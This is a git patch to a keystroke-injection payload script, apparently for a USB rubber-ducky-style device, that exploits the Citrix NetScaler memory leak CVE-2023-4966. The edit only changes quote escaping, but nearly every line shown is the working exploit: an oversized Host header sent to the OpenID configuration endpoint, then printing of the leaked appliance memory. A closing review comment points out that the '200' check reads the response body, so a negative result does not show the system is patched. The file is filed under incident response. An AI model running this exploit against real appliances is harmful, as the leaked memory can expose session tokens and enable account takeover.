From fd03dfda79b4789f5e86848108318bede0a64c51 Mon Sep 17 00:00:00 2001
From: Aleff
Date: Sun, 9 Jun 2024 12:05:56 +0200
Subject: [PATCH] Update win-payload.txt
---
 .../win-payload.txt | 18 +++++++++---------
 1 file changed, 9 insertions(+), 9 deletions(-)
diff --git a/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/win-payload.txt b/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/win-payload.txt
index 1a2efae1..5bacf0d8 100644
--- a/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/win-payload.txt
+++ b/payloads/library/incident_response/Exploit_Citrix_NetScaler_ADC_and_Gateway_through_CVE-2023-4966/win-payload.txt
@@ -3,7 +3,7 @@
 * REM # Title : Exploit Citrix NetScaler ADC and Gateway through CVE-2023-4966 #
 * REM # Author : Aleff #
 * REM # Version : 1.0 #
-* REM # Category : incident-response #
+* REM # Category : incident-response #
 * REM # Target : Citrix NetScaler ADV; NetScaler Gateway #
 * REM # #
 * REM ##################################################################################
@@ -23,35 +23,35 @@ QUACK DELAY 1000
 QUACK STRING $header_value = 'a' * 24576
 QUACK ENTER
 QUACK DELAY 500
-QUACK STRING $header_value = $header_value -replace "\n", ""
+QUACK STRING $header_value = $header_value -replace \"\n\", \"\"
 QUACK ENTER
 QUACK DELAY 500
-QUACK STRING $headers="-H 'Host:$header_value'"
+QUACK STRING $headers=\"-H 'Host:$header_value'\"
 QUACK ENTER
 QUACK DELAY 500
 QUACK STRING $headers = @{'Host' = $header_value}
 QUACK ENTER
 QUACK DELAY 500
-QUACK STRING $uri = "https://$HOSTNAME/oauth/idp/.well-known/openid-configuration"
+QUACK STRING $uri = \"https://$HOSTNAME/oauth/idp/.well-known/openid-configuration\"
 QUACK ENTER
 QUACK DELAY 500
 QUACK STRING $response = Invoke-RestMethod -Uri $uri -Headers $headers -Method GET -TimeoutSec 10
 QUACK ENTER
 QUACK DELAY 500
-QUACK STRING if ($response.Substring(0, 3) -eq "200") {
+QUACK STRING if ($response.Substring(0, 3) -eq \"200\") {
 QUACK ENTER
 QUACK DELAY 500
-QUACK STRING Write-Host "--- Dumped memory ---"
+QUACK STRING Write-Host \"--- Dumped memory ---\"
 QUACK ENTER
 QUACK DELAY 500
 QUACK STRING $response.Substring(131050) # 131051 - 1
 QUACK ENTER
 QUACK DELAY 500
-QUACK STRING Write-Host "--- End ---"
+QUACK STRING Write-Host \"--- End ---\"
 QUACK ENTER
 QUACK DELAY 500
 QUACK STRING } else {
 QUACK ENTER
 QUACK DELAY 500
-QUACK STRING Write-Host "Could not dump memory"}
-QUACK ENTER
\ No newline at end of file
+QUACK STRING Write-Host \"Could not dump memory\"}
+QUACK ENTER
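Review bot: The `if ($response.Substring(0, 3) -eq \"200\")` line and its `else` branch remain the only verdict this payload gives, and that comparison looks at the first three characters of what `Invoke-RestMethod` returns, which is the response body rather than an HTTP status. A "Could not dump memory" line is therefore not evidence that an appliance is patched, which matters for a payload filed under `incident_response`. I would add a comment before the test, in the header's `REM` style, such as `REM A negative result does not confirm remediation; check the installed build against the vendor advisory for CVE-2023-4966`. A second `REM` stating that the probe is a GET to `/oauth/idp/.well-known/openid-configuration` with a 24576-character `Host` value would let responders match this test traffic in appliance and proxy logs. The script begins above this hunk, so any setup it relies on is not visible here.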